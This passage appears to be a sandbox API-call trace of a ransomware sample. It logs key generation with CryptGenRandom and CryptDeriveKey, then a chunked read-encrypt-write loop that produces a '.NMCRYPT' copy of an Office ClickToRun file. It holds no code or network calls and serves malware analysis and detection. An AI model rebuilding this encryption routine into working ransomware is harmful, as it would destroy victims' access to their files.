hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.532] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.533] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.533] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.534] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d0ac | out: phHash=0x60d0ac) returned 1 [0143.534] CryptHashData (hHash=0x8bdbf8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.534] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x8bdbf8, dwFlags=0x4, phKey=0x60d0b0 | out: phKey=0x60d0b0*=0x8bdc78) returned 1 [0143.534] CryptSetKeyParam (hKey=0x8bdc78, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.534] CryptSetKeyParam (hKey=0x8bdc78, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.534] wcslen (_String="\\\\?\\") returned 0x4 [0143.534] CryptDuplicateKey (in: hKey=0x8bdc78, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8bdd38) returned 1 [0143.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0143.534] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4450) returned 1 [0143.534] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.535] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.536] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.537] GetLastError () returned 0x0 [0143.537] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.538] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.538] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.538] GetLastError () returned 0x0 [0143.538] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.538] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.538] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.538] GetLastError () returned 0x0 [0143.538] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.538] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.538] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.538] GetLastError () returned 0x0 [0143.538] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.538] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.538] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.538] GetLastError () returned 0x0 [0143.538] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.539] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.539] GetLastError () returned 0x0 [0143.539] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.539] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.539] GetLastError () returned 0x0 [0143.539] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.539] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.539] GetLastError () returned 0x0 [0143.539] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.539] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.539] GetLastError () returned 0x0 [0143.539] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.539] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.539] GetLastError () returned 0x0 [0143.539] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.539] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.539] GetLastError () returned 0x0 [0143.539] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.539] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.540] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.540] GetLastError () returned 0x0 [0143.540] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.540] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.540] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.540] GetLastError () returned 0x0 [0143.540] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.540] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.540] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.540] GetLastError () returned 0x0 [0143.540] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.540] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.540] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.540] GetLastError () returned 0x0 [0143.540] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.540] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.540] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.540] GetLastError () returned 0x0 [0143.540] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.540] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.540] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.540] GetLastError () returned 0x0 [0143.540] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.540] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x62, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x62, lpOverlapped=0x0) returned 1 [0143.541] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x62, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0143.541] GetLastError () returned 0x0 [0143.541] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0143.541] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, 